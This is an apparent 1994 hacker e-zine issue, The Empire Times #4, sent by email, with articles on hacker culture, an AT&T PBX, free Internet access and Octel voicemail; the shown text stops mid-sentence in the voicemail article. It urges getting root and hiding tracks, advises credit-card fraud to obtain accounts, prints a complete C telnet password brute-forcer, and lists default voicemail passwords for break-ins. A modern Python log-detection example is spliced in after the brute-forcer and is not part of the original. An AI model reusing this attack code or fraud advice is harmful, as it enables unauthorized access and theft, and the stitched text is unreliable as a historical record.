From armitage@dhp.com Sun Sep 25 19:26:49 1994
Date: Sun, 25 Sep 1994 15:48:19 -0400
From: armitage@dhp.com
To: dtangent@fc.net

%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%                     T H E   E M P I R E   T I M E S                      %
%                     -------------------------------                      %
%                         The True Hacker Magazine                         %
%                                                                          %
%                     September 13th, 1994    Issue 4                      %
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%

This Issue's Features:

 #   Selection                      Author         Size
 -   ---------------------------    ---------      ----
 X.  Introduction                   albatross        3k
 1.  The Cyber-punk Image           firefly          7k
 2.  AT&T Definity System 75/85     erudite         15k
 3.  How to get free Internet       Pud C0ur13r     14k
 4.  The Octel VMB System           da telcopimp    20k
 5.  My Life as a Narc...           noelle          10k
 6.  Hacking Simplex Locks          erudite          3k
 7.  SS7 / Caller ID Discussion     grendal          6k
 8.  Don't Tell us Our Name         erudite          3k

------------------------------------------------------------------------------

Founder: Albatross
Organizer: Armitage
Contributors: Da Telcopimp, Erudite, Firefly, Grendal, Noelle, PuD Courier.
Special Thanks: AT&T, Sevenup.

===========================================================================

                        -=- The Empire Times -=-
                              Introduction

Yes it is true. The Empire Times is back online and ready for a little rok -n- roll. The plan is to bring back what appears to be lost from the underground world. The Times will go into details on topics of Cellular fone phreaking to the personal lives of those hackers which we all know and love. I believe this issue will spark the interest of those who have become cyber-potatoes and those who have yet to realize what a UNIX system is all about.

It is time for the Hacker Klan to unite and share information so that we can expand our realm of control over the growing InterNet which we love so much. Just think how much money is spent to keep us out of systems which (as we all know) never works. I have always believed that if there is a way for a regular user to access a system, then there is a way in.
Always use your brain as to the capabilities of the agencies which are out to stop us, such as the FBI, S.S., and the Military. When obtaining 'root' at sites, always remember to hide your tracks into the system. Check for log files, see what wrappers and possible cron jobs which might be running to catch you. Those who prevail shall always be known as 'Elite'. Those who fail just didn't learn the tricks of the trade fast enough.

Just remember that we are building a MAFIA on the InterNet, if you want it to succeed, then YOU know what has to be done. So keep your minds growing and those electrons flowing.

Last words
==========

To the Virginia Crue: If the South is to rise again, Ya'll are the ones that'll do it.

To the Maryland Crue: We have more Net access than any state. Make sure that ya'll keep it like that. Smoke it like a NeckBone.

To the D.C. Crue: I've never seen so many hacked outdials and PBX's. Keep it that way. Don't 4 get your 9mm.

"I'm only trying to build an Empire." -Alby

==============================================================================

                        -=- The Empire Times -=-
                     Volume 2, Issue 4, File 1 of 8
                          The Cyberpunk Image
                               by firefly

There's a new flick that they are showing at schools in the area this year. It's one of those documentaries that is produced exclusively for educators that targets a certain culture and proceeds to slander against it. "Cyberpunk" is such a movie. I had the unfortunate luck to sit through it in a general education program in college last semester. That was bad enough ...but then I had to show it to a class this summer and then spark discussion about it when I disagreed with the entire theme of the movie!

The movie "Cyberpunk" was a documentary that showed the use of computers and continued the media's hype of the so-called "cyberculture". The film was well-done, and well-organized, but I disagree with what I consider are the film's themes about the "computer generation" (a.k.a.: cyber-punks).
Not to mention the fact it was written entirely in "computer-esque" with techno music, rapid-picture imagery, and other "information age" fads. This paper will discuss the term "cyberpunk" itself, offer observations about this culture, and conclude with the true nature of the computer generation. The term cyberpunk, coined by William Gibson in his Neuromancer book, is a literary and now, thanks to the media, an overused term used to describe every type of "console cowboy" from a computer programmer to a malicious electronic explorer, to someone who sees a Gibson-esque future run by computers, to someone who dresses in leather, and carries a digital pager. The term "punk" usually refers to someone against the current cultural norms of society. The so-called cyberpunks are considered the small segment of society that is against the current norms of "regular people". Well, the truth of the matter is that these "cyber-dudes" have grown up around computers, digital games, and electronic tools in the classroom and workplace. Is it their fault that computers have simplified many redundant tasks in society? Is it these people's fault that computers now help fly aircraft, make cars, improve international communication? NO! This computer generation is simply the first generation to pioneer such a radically new concept of existence. While our forefathers saw things in a linear perspective, we see them in a virtual reality that can be changed into a nonlinear environment depending on our virtual vantage point. Timothy Leary would say this is "consciousness-expansion". Consider your parents and the advent of television or the superhighway across your home state. Your parents saw it as revolutionary, and possibly frightening that automobiles could "drive" in 6-8 lanes of 55mph traffic across the nation. They probably saw the political and Orwellian problems with having a video receiver in their living rooms that could broadcast political messages. 
But they adapted and grew up with it, while their parents looked on in amazement. The same holds true with the electronic age. My generation grew up with Atari, Apple, Windows, and modems. We are used to "driving" with multiple pathways simultaneously -- parallel processing -- our lives, and utilizing the vast speed that information or data takes these days to further advance ourselves. This illustrates how those in power of any sort -- political, literary, media, business -- see this generation, as a band of people who use strange things to live their lives. Well, the television was strange to my grandmother, but she adapted -- as my mother grew up with it --, and so will this generation of leaders adapt as our generation of people grow up with computers. The difference with this computer generation is that we deal with so much information at such a rapid pace, that those who look on us (ie, policymakers and journalists) cannot keep up with it...hence the fear of what they don't know. "Cyberpunk" sounds evil. The unknown is evil. Therefore, since nobody understands the cyber-culture, those that do are therefore evil. Simple societal algebra. The movie is full of stereotypes. Firstly, there is no cyberpunk standard for music. People think techno is the music of the computer age because it is fast and computer-generated. False. Granted, many people who like techno like computers, but a history book of 2020 should not show the 1990s' cyber-culture liking techno in the same way as 18th century victorians enjoyed the waltz. Outstanding on-line magazine UXU-148 Technophilia mentions that the cyber-culture likes any form of music, and not only computer-generated tunes. I associate with hackers, and people the media calls "cyberpunks". Our music ranges from hard rock and metal to movie soundtracks to top forty to reggae, and some techno. Yet, throughout the movie, viewers are led to believe that fast techno is the "music of the cyberpeople." 
Granted, a "rave", an all-night computer-controlled techno event, is the climactic part of being a part of a cyberculture, but it is not symbolic of the entire culture of computer-users.

There was "lotsa leather". Again, another stereotype. True, the classic street punk wore combat boots and a leather jacket, but to imply that this is how an entire subculture dresses is absurd! To dispel this myth, and meet the movie on its own level of stereotyping, go to any rave, which many consider the climactic event in the cyberculture. The fashion ranges from the sublime to the ridiculous, from exotic to erotic, from jeans and T-shirts to leather and handcuffs. Mostly people dress the way they go to a dance club.

The people they interviewed in the movie were interviewed at a convention, or another public place, where they are dressing to make an impression. Just because someone wears leather at a convention or on a documentary tape does not mean he/she represents the entire culture being profiled, or that the person dresses like that regularly. I know of very few hard-core cyber-kids who dress that way. I frequently wear shorts, jeans, t-shirts and turtlenecks. Part of my accessories is a pager and ATM card. Gee. According to Cyberpunk, I cannot be a member of the cyberculture, since I don't own a leather jacket or have long hair.

Enough ranting. I've got better things to do. But I just thought it interesting that this flick is shown as an (and meant to be an) "objective educational tool" to college students to show them about computers and society, but portrays them as evil, conniving thugs.

Votes on next topic: Business Intelligence? or Social Engineering?
==============================================================================

                        -=- The Empire Times -=-
                     Volume 2, Issue 4, File 2 of 8
                       AT&T Definity System 75/85
                               by erudite

                    ================================
                       AT&T Definity System 75/85
                         Communications System
                      Description & Configuration
                    ================================

=====
Intro
=====

Let me introduce you to the AT&T Definity System 75/85. This communications system is a product of the merging of the AT&T System 75 and System 85 architectures. The name Definity came from the two words "definitive" and "infinity".

Let me also tell you that there are many different communications systems out there. (Merlins, AT&Ts) Many many many, I couldn't name them all, but the AT&T systems are nice. I enjoy working with them, and I hope you enjoy this text file.

This System is an advanced business communications system. A Digital Communications Protocol (DCP) allows data communication through data terminal equipment connected to the digital switch. This allows the system to handle data and voice communications simultaneously.

The System can handle up to 1600 lines that support all digital, hybrid, and analog terminals and equipment, up to 400 trunks, and up to 400 Automatic Call Distribution (ACD) Agents. The data switching capacity is up to 800 digital data endpoints■, and 160 integrated and combined pooled modem facilities.

■ Digital Data Endpoints include the following:
  ■ 510D Personal Terminal or 515-Type Business Communications Terminal
  ■ 7404D Terminals
  ■ 7406D or 7407D Equipped with optional Data Module Base
  ■ Asynchronous Data Units (ADU) (DCE type device that has RS-232C interface)
  ■ Digital Terminal Data Modules
  ■ 3270 Data Modules
  ■ Internal Data Channels
  ■ Trunk Data Modules (Modular)
  ■ Processor Data Modules (Modular)

==========
Networking
==========

The Processor Port Network (PPN) always provides the switch processing element (SPE) and port circuits.
An Expansion Port Network (EPN) is available to increase the line size of any system by allowing you to add additional port circuits. The EPN connects to the PPN over a fiber optic cable and may be remotely situated up to 1.86 miles away. It may also be located adjacent to the PPN.

This System may be arranged stand-alone or you can integrate it into a private network. You can form these types of networks:

  ■ Tandem Tie Trunk Network (TTTN)
  ■ Electronic Tandem Network (ETN)
  ■ Main/Satellite Configuration
  ■ Distributed Communications System (DCS)
  ■ Centralized Attendant Service (CAS)

An Integrated Services Digital Network Primary Rate Interface (ISDN-PRI) makes it possible for the Definity System to access various private and public network services. With ISDN-PRI you can access these services:

  ■ Call by Call Service Selection
  ■ Private Network Services
  ■ Information Forwarding
  ■ Call Identification Display
    - Connected Number Display
    - Connected Party Name Display
    - Calling and Called Number Record Display
    - Calling and Called Party Name Display

=============
Configuration
=============

The actual System is encased in a pair of "cabinets" which have a fiber optic link between them. It is also common to have a stack of about three "cabinets" of a smaller size, for different models. Shown here is a typical multi-carrier system with a Processor Port Network (PPN) cabinet and Expansion Port Network (EPN) cabinet.
[Diagram: two cabinets, each labelled "AT&T DEFINITY SYSTEM 75/85", joined by a fiber optic connection. Labelled attachments: attendant consoles; outside trunks and lines; outside private line data transmission equipment or analog switched network; business communication terminals; data terminals; AUDIX; modular data processor; manager terminal; optional host computer or call management system; asynchronous data unit; single line voice terminals; data terminals.]

===================
Voice and Data
Management Features
===================

There are a lot of voice features and services, in fact too many to list, so I will do a rundown of all the interesting and useful features and services. It has many Voice Management, Data Management, Network Services, System Management, Hospitality Services, and Call Management Services.

■ Attendant Display: Contains useful call related information that the call attendant can use to operate the console more efficiently.

■ Audio Information Exchange Interface (AUDIX): This interface allows both inside system users and remote callers to edit, receive, send, write, and forward voice messages.

■ Authorization Codes: A means to control user privileges throughout the system.

■ Automatic Incoming Call Display: Shows identity of remote caller and relays it to the display console.

■ Class of Restriction: Defines up to 64 classes of user restriction.

■ Conference Service
  - Attendant Conference: Allows Attendant to construct a conference call.
  - Terminal Conference: Allows remote user to construct a conference call without attendant assistance.

■ Data Privacy: This, when activated by user, protects analog data calls from being interrupted by any of the system's overriding features, and denies ability to gain access to, and or superimpose tones.
■ Data Restriction: This feature is the same as Data Privacy, except that it is issued by the administrator to a certain extension # for indication of a dedicated private data extension.

■ DCS Call Forwarding All Calls: This is the voice forwarding service.

■ DCS Distinctive Ringing: This is simply a distinctive ringing feature.

■ Dial Access: This is simply the package of features that allows anyone in the system to dial anyone else, such as the attendant console.

■ DS1 Tie Trunk Service: This service provides a digital interface for the following trunks and more.
  ■ Voice Grade DS1 Tie Trunks
  ■ Alternative Voice/Data (AVD) DS1 Tie Trunks
  ■ Digital Multiplexed Interface (DMI) Tie Trunks
  ■ Central Office (CO) Trunks
  ■ ISDN-PRI Trunks
  ■ Remote Access Trunks
  ■ Wide Area Telecommunications Service (WATS) Trunks

■ Facility Test Calls: Gives a voice terminal user access to all the features and functions that are used for maintenance testing, such as access to system tones, access to specific trunks, etc.

  Note: AT&T designed the Facility Test Calls Feature for testing purposes and system maintenance only. When properly administered, AT&T claims that the customer is responsible for all security items and for securing the system from unauthorized users, and that all users should be aware of how to handle access codes. AT&T claims they will take no responsibility for poor administration.

■ Hunting: The internal hunting feature is very nice, as you probably know, it rings down if busy, or if it receives a dial timeout.

■ Information System Network Interface (ISN): AT&T ISN is a packet switched local area network that will link with mainframes, workstations, personal computers, printers, terminals, storage devices, and communication devices.

■ Integrated Services Digital Network Primary Rate Interface (ISDN-PRI): This interface allows connection of the system to an ISDN Network by means of an ISDN frame format called PRI.
■ Inter-PBX Attendant Calls: Positions for more than one branch, and each branch has a Listed Directory Number (LDN).

■ Modem Pooling: Switches connections of digital data endpoints.

■ Network Access (Private): Connect to the following Networks
  ■ Common Control Switching Arrangement (CCSA)
  ■ Electronic Tandem Network (ETN)
  ■ Enhanced Private Switched Communications Service (EPSCS)
  ■ Tandem Tie Trunk Network (TTTN)
  ■ Software Defined Network (SDN)

■ Network Access (Public): Access to public networks.

■ Privacy: Protects from others bridging into their extensions.

■ Remote Access: This lets you access the system remotely, again, AT&T doesn't want to take responsibility for anything that is abused with this feature.

■ Restrictions: There is a large list of restriction features that I'm sure would come in handy.

■ Service Observing: Allows high access users to monitor others' calls, again, AT&T does not want to take any legal fees for misuse of this feature.

■ Transfers: Allows any user to do an attendant call transfer without an attendant's assistance.

========
Software
========

The System comes with switched services software, administrative software, and maintenance software, all running on a real-time operating system.

■ Switched Services Software: This Software provides all the calling features and services. It is also responsible for relaying any information to the console display.

■ Administrative Software: This Software is needed to run administrative tasks and configurations.

■ Maintenance Software: The Maintenance Software is used to keep everything running properly.

=====================
System Administration
=====================

The "Access Code" you will encounter on these systems is a 1, 2, or 3 digit number. The pound (#) and star (*) keys can be used as the first digit of the code. Below you will see a typical Screen Format taken from one of my logs, information aside you can see what the administration Screens look and feel like.
--------------------------------------------------------------------
                                                      Page 1 of 4
                            STATION

Extension: ____         Type: _____   Lock Messages: _     COR: _   Room: _____
     Port: ___________                Security Code: ____  COS: _   Jack: _____
     Name: ___________                Coverage Path: ___           Cable: _____

FEATURE OPTIONS

        LWC Reception? _____              Headset? _    Coverage Msg Retrieval? _
       LWC Activation? _              Auto Answer? _          Data Restriction? _
Redirect Notification? _   Idle Appearance Preferences? _  PCOL/TEG Call Alerting? _
          Data Module? _   Restrict Last Appearance? _                  Display? _

ABREVIATED DIALINGS

   List1: _____    List2: _____    List3: _____

BUTTON ASSIGNMENTS

   1: _______      6: _______
   2: _______      7: _______
   3: _______      8: _______
   4: _______      9: _______
   5: _______
-------------------------------------------------------------------

==================
System Maintenance
==================

Finally the Maintenance section, where you can see where the errors are logged, where all the alarms are sent, printed, etc.

There are 3 different types of alarms:

  ■ Major Alarms (Critical Damage, requires immediate attention)
  ■ Minor Alarms (Errors, still operable, requires action)
  ■ Warning Alarms (no noticeable degradation of service, not reported to console or INADS)

The error log, as well as the alarm log, is reported to and can be viewed at the Manager Terminal.

==============
Basic Acronyms
==============

ADU     Asynchronous Data Unit
AUDIX   Audio Information Exchange
COR     Class of Restriction
COS     Class of Service
DCP     Digital Communications Protocol
DMI     Digital Multiplexed Interface
EPN     Expansion Port Network
ISDN    Integrated Services Digital Network
PPN     Processor Port Network
PSDN    Packet Switching Data Network

=====
Tones
=====

Here are most of the tones, mostly either the interesting ones or the ones the System uses often, with their frequencies and patterns.
Tone                             Frequency          Pattern
----                             ---------          -------
Answer Back 3                    2225 Hz            3000 on
Answer Back 5                    2225 Hz            5000 on
Bridging Warning                 440 Hz             1750 on, 12000 off, 650 on; repeated
Busy                             480 Hz + 620 Hz    500 on, 500 off; repeated
Call Waiting
  Internal                       440 Hz             200 on
  External                       440 Hz             200 on, 200 off
  Attendant                      440 Hz             200 on, 200 off
  Priority Call                  440 Hz             200 on, 200 off, 200 on, 200 off, 200 on
Call Waiting Ring Back           440 Hz + 480 Hz;   900 on (440 + 480)
                                 440 Hz             200 on (440)
                                                    2900 off; repeated
Cnrt Att Call
  Incoming Call Identification   480 Hz & 440 Hz    100 on (480), 100 on (440),
                                 & 480 Hz           100 on silence;
  Dial Zero, Attendant
  Transfer, Test Calls,          440 Hz             100 on, 100 off, 100 on
Coverage                         440 Hz             600 on
Confirmation                     350 Hz + 400 Hz    100 on, 100 off, 100 on, 100 off, 100 on
Dial                             250 Hz + 400 Hz    Continuous
Executive Override               440 Hz             300 on followed by
Intercept                        440 Hz & 620 Hz    250 on (440), 250 on (620); repeated
Ringback                         440 Hz + 480 Hz    1000 on, 3000 off; repeated
Zip                              480                500 on

=====
Outro
=====

■ This file was based on the statistics for the AT&T Definity System 75/85 (multi-carrier cabinet model) communications system.

I hope you learned something, anywayz, questions comments, system login information, defaults, where to get manuals, or anything else. email me (armitage@dhp.com) and I will get back to you.

erudite (armitage on irc)

==============================================================================

                        -=- The Empire Times -=-
                     Volume 2, Issue 4, File 3 of 8
                   How to Get a Free Internet Account
                             by PuD C0ur13r

I know the story. You're just starting out, and you don't have an internet account. And you don't want to pay for one, right? Well, here are some tips to getting free internet.

Freenets
----------------

Oh bleh, you say. A freenet?!?!@#$ Well, yes, a freenet. Why not? You get a mailing address, a gopher, maybe usenet, maybe irc, maybe some other added features. Heck, on some freenets you get a shell account.
But even if you don't get a shell account, there are many ways to get something of a shell. Vi, Veronica, gopher, and many other useful little bugs. This article is not for telling how to get shell on a freenet, because that would take up another article. But here are some freenets:

telnet to:

leo.nmc.edu                   login: visitor
yfn.ysu.edu                   login: visitor
freenet.scri.fsu.edu          login: visitor
freenet.carleton.edu          login: guest
freenet.victoria.bc.ca        login: guest
freenet.lorain.oberlin.edu    login: guest
freenet.hsc.colorado.edu      login: guest
bigcat.missouri.edu           login: guest
garbo.uwasa.fi                login: guest
ids.net                       login: guest
bbs.augsburg.edu              login: guest
tpe.ncm.com                   login: guest
michael.ai.mit.edu            login: guest
bbs.isca.uiowa.edu            login: guest/new
phred.pc.cc.cmu.edu 8888      login: guest/new
muselab.ac.runet.edu          login: bbs (send mail to 'gabe' to access irc)
netaxs.com                    login: bbs
shadow.acc.iit.edu            login: bbs
bbs.augsburg.edu              login: bbs
utbbs.civ.utwente.nl          login: bbs
oscar.bbb.no                  login: bbs
bugs.mty.itesm.mx             login: bbs
tudrwa.tudelft.nl             login: bbs
ara.kaist.ac.kr               login: bbs
cc.nsysu.edu.tw               login: bbs
cissun11.cis.nctu.edu.tw      login: bbs
badboy.aue.com                login: bbs
tiny.computing.csbsju.edu     login: bbs
Quartz.rutgers.edu            login: bbs
bbs.fdu.edu                   login: bbs
paladine.hacks.arizona.edu    login: bbs
freedom.nmsu.edu              login: bbs
kids.kotel.co.kr              login: bbs
wariat.org                    login: bbs
seabass.st.usm.edu            login: bbs pass: bbs
heartland.bradley.edu         login: bbguest
freenet-in-a.cwru.edu         login:
oubbs.telecom.uoknor.edu      login:
chop.isca.uiowa.edu           login:
pc2.pc.maricopa.edu 4228      login:
af.itd.com 9999               login:
hpx6.aid.no                   login: skynet
launchpad.unc.edu             login: launch
atl.calstate.edu              login: apa
forest.unomaha.edu            login: ef
cue.bc.ca                     login: cosy
softwords.bc.ca               login: cosy
vtcosy.cns.vt.edu             login: cosyreg
Nebbs.nersc.gov               login: new
Milo.ndsu.nodak.edu           login: new pass: new
tolsun.oulu.fi                login: box
mono.city.ac.uk               login: mono pass: mono
newton.dep.anl.gov            login: cocotext
kometh.ethz.ch                answer at prompts:
                                #        call c600
                                TERMSERV call avalon
                                login:   bbs

Va Pen or School Internet
----------------------------

I know that in Virginia, there is a semi-internet provider called Va Pen. I call it semi, because only teachers usually get a shell account. And the account will only last for a year, so then you have to subscribe for the account again. Also, your school might have some kind of internet feed. Try hooking up with that in any way possible.

Card an Account
-------------------

There isn't much to be said on this. For Delphi, all you usually need is a Credit Card Number Generator of some sort. The account will probably only last about a day, but you can do it as many times as you want. If you have a real CC number, with real name and address, then you will have a semi-legit account, but that will probably only last until that person you're carding gets his or her bill. :-) Experiment. Call up your local provider, and try carding it. Chances are, it will work.

Decservers
-----------------

Some decservers are hooked up to the internet. The only way you can find them is to scan for them. When you do find a decserver or two, do the 'show services' command. If you see anything that is remotely related to 'telnet' or 'rlogin' then play around with it. You might be able to telnet to a site on the internet.

1800 Internet
-----------------

There are two kinds of 1800 Internet. One is a 1800 number that is kind of like a decserver, except it's not. It lets you telnet like a decserver though, but it only lets you use IP numbers. I have only played around with a very few of these "decservers", because 1800 numbers have ANI. And this kind of telnet gets used to hell, so it doesn't last very long. One person I knew got called by the authorities for using a 1800 "decserver". But it's not really illegal to use, because you didn't have to hack it, or log into it. It's just there. But I wouldn't take that legal advice to heart, though.
Another kind of 1800 Internet is where you can call up a unix and get an account through the 1800 number. Delphi has this, as does IIA.org. Cyberspace.net's number used to be 1800-833-6378, but I hear that it is down. A Plain Hacking Good Time. ------------------------------ Brute it away baby. You could also take that delphi account you just carded, finger a site, and brute it that away. Bruting works about 2% of the time now, but this script will brute for you. /* ###################################### # Unix telneting brute force hacker # ###################################### */ #include #include #include /* ######################################## # Set this according to the path and # # filename where telnet is located # ######################################## */ #define TELNETPATH "/usr/ucb/telnet" /* ############################################################## # The Following are set to default on a SunOs login format. # # You may need to change these for other systems. # ############################################################## */ #define LOGINSTRING "login:" #define PASSSTRING "Password:" #define GOTONESTRING "Last login" /* ###################################################### # You won't need to edit anything after this point # ###################################################### */ #define GETC(c) read(readfd,&(c),1) /* Functions to read and write pipe */ #define PUTC(c) write(writefd,&(c),1) #define PUTS(s) write(writefd,(s),strlen(s)) char *HOST[80]; /* String: Holds connect to host on telnet */ char DBUG = 0; /* Switch: for Debug/Background modes */ char EOO = 0; /* Switch: Exit after 1st find */ char *afilename[80]; /* String: filename to account list */ char *pfilename[80]; /* String: Holds filename to password list */ char *ofilename[80]; /* String: Holds filename to output file */ char account[10]; /* Strings: Hold account/pw for attempts */ char password[10]; FILE *accounts; /* File pointers */ FILE *passwords; FILE *found; char ch; 
/* General purpose */ char buf[800]; int count; int p1[2], p2[2]; /* Streams for the process pipe connection */ int writefd, readfd; /* Handles for the pipe */ /* ############################################################################### # Handles the death of the telnet process due to a timeout on connection. # # Restarts a telnet process and reconnects to the host # ############################################################################### */ void *death() { if (1 == 1) { wait3(NULL, WNOHANG, NULL); signal(SIGCLD, death); switch (fork()) { case 0: dup2(p2[0], 0); dup2(p1[1], 1); execl(TELNETPATH, "telnet", 0); printf("Exec Failed\n"); default: PUTS(HOST); return; } } wait3(NULL, WNOHANG, NULL); signal(SIGCLD, death); return; } /* ########################### # Error exit routine/Help # ########################### */ void help(parg) { printf("\nUsage: %s
-a -p -o\n", parg);
    printf("Flags: -d (Debug/Run in foreground)\n");
    printf(" -1 Exit after first find\n\n");
    exit();
}

/*  ########
    # MAIN #
    ########  */

main(argc, argv)
int argc;
char **argv;
{
    if (argc == 1)
        help(argv[0]);
    strcpy(HOST, argv[1]);
    for (count = 2; count != argc; count++) {
        if (argv[count][0] != '-') {
            printf("\n:: Invalid Command Line ::\n");
            help(argv[0]);
        }
        ch = argv[count][1];
        switch (ch) {
        case 'a':
            if (!afilename[0])
                strcpy(afilename, argv[count] + 2);
            break;
        case 'p':
            if (!pfilename[0])
                strcpy(pfilename, argv[count] + 2);
            break;
        case 'o':
            if (!ofilename[0])
                strcpy(ofilename, argv[count] + 2);
            break;
        case 'd':
            DBUG = 1;
            break;
        case '1':
            EOO = 1;
            break;
        default:
            printf("\n:: -%c: Unknown option ::\n\n", ch);
            help(argv[0]);
        }
    }
    while (!afilename[0]) {
        printf("AccountList: ");
        gets(afilename);
    }
    while (!pfilename[0]) {
        printf("PasswrdList: ");
        gets(pfilename);
    }
    while (!ofilename[0]) {
        printf("Outfile: ");
        gets(ofilename);
    }
    printf("\nHOST: %s", HOST);
    printf("\nAccountFile: %s", afilename);
    printf("\nPasswrdFile: %s", pfilename);
    printf("\nOutfile: %s", ofilename);
    printf("\nDebug: ");
    if (DBUG == 0)
        printf("Off");
    else
        printf("On");
    printf("\n");
    strcpy(buf, HOST);
    strcpy(HOST, "open ");
    strcat(HOST, buf);
    strcat(HOST, "\n");
    printf(HOST);
    if (DBUG == 0) {
        if (fork()) {
            printf("\nRunning in the background. ");
            exit();
        }
        printf("PID: %d\n", getpid());
    }
    signal(SIGCLD, death);    /* Execute death function when child dies */

/*  #######################################
    # Set up pipes and start telnet child #
    #######################################  */

    if (pipe(p2) == -1 || pipe(p1) == -1) {
        printf("Error making pipes.\n");
        return;
    }
    readfd = p1[0];     /* read from p1 */
    writefd = p2[1];    /* write to p2 */
    switch (fork()) {
    case -1:
        printf("Couldnt fork off a child\n");
        return;
    case 0:                         /* the child */
        dup2(p2[0], 0);             /* read from p2 */
        dup2(p1[1], 1);             /* write to p1 */
        execl(TELNETPATH, "telnet", 0);
        printf("Exec failed.\n");
        exit(-1);
    default:                        /* parent */
        break;
    }

/*  ##############
    # Open files #
    ##############  */

    if ((accounts = fopen(afilename, "r")) == NULL) {
        printf("ERROR: AccountFile <%s> Not found.\n", afilename);
        exit();
    }
    if ((passwords = fopen(pfilename, "r")) == NULL) {
        printf("ERROR: PasswrdFile <%s> Not Found.\n", pfilename);
        exit();
    }
    found = fopen(ofilename, "w+");
    fprintf(found, "Trying Host: %s\n\n", buf);
    fflush(found);
    PUTS(HOST);     /* Send open to telnet */
    while (1) {     /* Loop to capture to buf */
        if (GETC(ch) > 0) {
            if (DBUG == 1)
                putchar(ch);
            buf[count++] = ch;
        }
        if (ch == 10)
            count = 0;
        if (strstr(buf, GOTONESTRING) != NULL) {    /* Check for good account */
            count = 0;
            fprintf(found, "Account: %sPassword: %s\n", account, password);
            fflush(found);
            printf("Got one! Account: %sPassword:%s\n", account, password);
            if (EOO == 1)
                exit();
        }
        if (strstr(buf, LOGINSTRING) != NULL) {     /* Check for login prompt */
            count = 0;
            strcpy(buf, "XXXXXXXX");
            if (ftell(passwords) == 0) {
                if (fscanf(accounts, "%s", account) == EOF) {
                    printf("End of accounts\n");
                    break;
                }
                strcat(account, "\n");
            }
            if (DBUG == 1)
                puts(account);
            PUTS(account);
        }
        if (strstr(buf, PASSSTRING) != NULL) {      /* Check for passwd prompt */
            count = 0;
            strcpy(buf, "XXXXXX");
            if (fscanf(passwords, "%s", password) == EOF) {
                strcpy(password, account);
                rewind(passwords);
            } else
                strcat(password, "\n");
            if (DBUG == 1)
                puts(password);
            PUTS(password);
        }
    }
}

Sites That give you shell accounts for free.
-----------------------------------------------
These are the only ones I know of offhand that you can telnet to and get
free accounts.

axposf.pa.dec.com        login: axpguest  pass:
cyberspace.org
cyberspace.net
cyberspace.com
cybernet.cse.fau.edu     (not shell, but has a lot of other nice things.)
cris.com
delphi.com               (well, you know, that 5 hours of free internet deal.)
nyx.cs.du.edu            login: new
hermes.merit.edu         login: um-m-net
m-net.ann-arbor.mi.us    login: newuser

If anyone wants to update, or make this t-phile more informational than it
already is, email roach@tmok.res.wpi.edu.
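The program earlier in this file replays one password list against each account in turn, so the target's login log shows runs of failures per account, all from one source. The following is an added example (not part of the original file) of detection logic for that pattern; the log format, addresses, thresholds and function names are constructed assumptions.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed log format (an assumption, not any real system's output).
LINE = re.compile(r"(?P<ts>\S+) login: (?P<res>FAILED|OK) "
                  r"user=(?P<user>\S+) from=(?P<src>\S+)")

def runs(users):
    """Collapse ['a', 'a', 'b'] into [('a', 2), ('b', 1)]."""
    out = []
    for u in users:
        if out and out[-1][0] == u:
            out[-1] = (u, out[-1][1] + 1)
        else:
            out.append((u, 1))
    return out

def guessing_sources(lines, window=timedelta(minutes=5),
                     min_failures=6, min_users=2):
    """Flag sources with min_failures failures over min_users accounts in one window."""
    recent = defaultdict(deque)   # source -> (time, user) of recent failures
    reports = {}
    for line in lines:            # lines are assumed to be in time order
        m = LINE.match(line)
        if not m:
            continue
        ts, src, user = datetime.fromisoformat(m["ts"]), m["src"], m["user"]
        if m["res"] == "OK":
            # A success from an already-flagged source is the first thing to triage.
            if src in reports:
                reports[src]["success_after"].append(user)
            continue
        q = recent[src]
        q.append((ts, user))
        while ts - q[0][0] > window:
            q.popleft()
        users = [u for _, u in q]
        if len(q) >= min_failures and len(set(users)) >= min_users:
            rep = reports.setdefault(src, {"runs": [], "success_after": []})
            if len(q) >= sum(n for _, n in rep["runs"]):
                rep["runs"] = runs(users)   # keep the densest window seen
    return reports

# Constructed sample: one mistyped password, then a list-driven guesser.
SAMPLE = [
    "1994-09-13T02:14:00 login: FAILED user=dave from=192.0.2.10",
    "1994-09-13T02:14:20 login: OK user=dave from=192.0.2.10",
] + [
    f"1994-09-13T02:15:{5 * i:02d} login: {res} user={user} from=198.51.100.7"
    for i, (user, res) in enumerate(
        [("alice", "FAILED")] * 3 + [("bob", "FAILED")] * 3
        + [("carol", "FAILED")] * 2 + [("carol", "OK")])
]
```

Equal run lengths across accounts (3 and 3 in the sample) point to one list being replayed per account, and the shorter final run followed by a success marks the account to lock and review first.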
==============================================================================

                        -=- The Empire Times -=-
                     Volume 2, Issue 4, File 4 of 8
                          The Octel VMB System
                            by Da TelcoPimp

             k|LLa ak-aSKi by Shadowdancer da TelC()PiMP

Octel is a type of VMB system, like Meridian Mail or Audix or whatever. But
Octel is not well known and I have recently been abusing these systems in my
area. There is one thing that I have noticed about these systems: they have
very good security. All this inpho was gotten from the Octel Voice
Information Processing manual Release 3.0, a woman who works for Northern
Telecom, and playing around on systems. So let this voyage into the world of
the Octel VMB system begin. Ignore all spelling errors, I cant spel worth
shit.

Format for this file is: each section that begins with the # symbol is one
of the options from the Main menu, and everything under it takes you down
levels.

Dialups:
========
There are two dialups for this system. There is the backdoor, the Octel
System number, and then there is the front door. The backdoor can be used to
leave messages and also to log in to the vmb. This also goes for the front
door as well. The difference between the front door and the backdoor is the
greeting. The front door is where you get the personalized greeting. The
backdoor will pick up and say something to the effect of "enter the mailbox
number you wish to leave a message to, or press # to indicate that you have a
mailbox on this system."

Hacking:
========
There is really not much to this part. I have encountered an octel system
backdoor where the box number was the same as the password. I have also
encountered a system where the password was the whole telephone number plus
a 1 before it, such as the box number was 1234 and the password was
1(pre)1234. These are all just basic defaults but they are what I have
encountered more frequently.

What to do after Logging in:
============================
After you have logged in, before you are brought up to the main menu, you may
be given some messages about different things, maybe a broadcast message from
your sysadmin or notification of automatically deleted messages etc. Here is
a list of options you can use at the main menu:

#1. Message Review
------------------
  11: To hear new messages. This option plays all new messages since the
      last session.
   1: To review all messages. This allows you to play all messages in your
      mailbox, in the order received.
   4: Replay. After listening to a message you are able to hit 4 and replay
      that last message. Commands used during playback will be listed at the
      end of this section.
   5: Get Envelope information. Envelope information basically gives you the
      specs on a message. It will tell you whether it came from someone who
